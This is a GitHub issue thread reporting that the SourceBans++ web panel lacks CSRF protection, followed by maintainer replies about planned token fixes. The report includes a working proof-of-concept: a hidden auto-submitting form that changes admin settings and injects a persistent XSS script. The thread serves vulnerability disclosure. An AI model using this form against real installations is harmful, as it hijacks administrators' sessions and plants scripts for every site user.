search

sbpp / sourcebans-pp

Admin, ban, and comms management system for the Source engine
https://sbpp.github.io/
Creative Commons Attribution Share Alike 4.0 International
334 stars 174 forks source link

Security: Web panel inadequate XSRF protection. #520

Open hctim opened 5 years ago

hctim commented 5 years ago

SourceBans++ web panel has inadequate XSRF protection. Administrators that are coerced or inadvertently exposed to malicious code may inadvertently allow an attacker to have full access to almost all of the functions of a website.

A simple exploit is shown below:

<form action="http://<VICTIM>/index.php?p=admin&c=settings" id="f" 
        method="POST" onload="document.getElementById('f').submit();">
    <input type="text" name="settingsGroup" value="mainsettings" />
    <input type="text" name="template_title" value="SourceBans" />
    <input type="text" name="template_logo" value="logos/sb-large.png" />
    <input type="text" name="config_password_minlength" value="4" />
    <input type="text" name="config_dateformat" value="" />
    <input type="text" name="dash_intro_title" value="popped" />
    <input type="text" name="dash_intro_text" value="<script>alert('persistent xss');" />
    <input type="text" name="enable_protest" value="on" />
    <input type="text" name="enable_submit" value="on" />
    <input type="text" name="enable_commslist" value="on" />
    <input type="text" name="default_page" value="0" />
    <input type="text" name="banlist_bansperpage" value="30" />
    <input type="text" name="bans_customreason[]" value="" />
    <input type="text" name="bans_customreason[]" value="" />
    <input type="text" name="asettings" value="Save Changes" />
    <input type="submit" />
  </form>

This form may be embedded in an iframe or otherwise occluded using normal exploit-hiding from the victim. A server owner who is coerced into visiting a website on a completely different domain will now proceed to use their credentials to submit the form on their sourcebans installation, resulting in a persistent xss now being presented to all of their users.

This is a simple example exploit, however the issue is far more pervasive than simply injecting persistent XSS. Almost all functions of the website can be controlled through XSRF-exploits tied with the data manipulation possible through data manipulation in pages/.

These issues are largely fixed by sending a nonce along with the data request. Please see the aforementioned CSRF article for more information.

CrazyHackGUT commented 5 years ago

has inadequate XSRF protection

SB++ absolutely don't have CSRF protection.

Groruk commented 5 years ago

Yeah, neither SourceBans++ nor Xajax have CSRF protection.

SourceBans++'s SessionManager is currently getting some updates, mainly to fix recurring session timeout issues for some users, but also to step up security with a One Time Token system and a CSRF Token system (+ request origin checks).

hctim commented 5 years ago

has inadequate XSRF protection

SB++ absolutely don't have CSRF protection.

I was under impression that the if (!defined("IN_SB")) early exit conditions were an attempted weak form of XSRF protection :)

Groruk commented 5 years ago

No, those IN_* constants in PHP, mostly serve the sole purpose of preventing people to run accessible PHP scripts that contain some kind of business logic.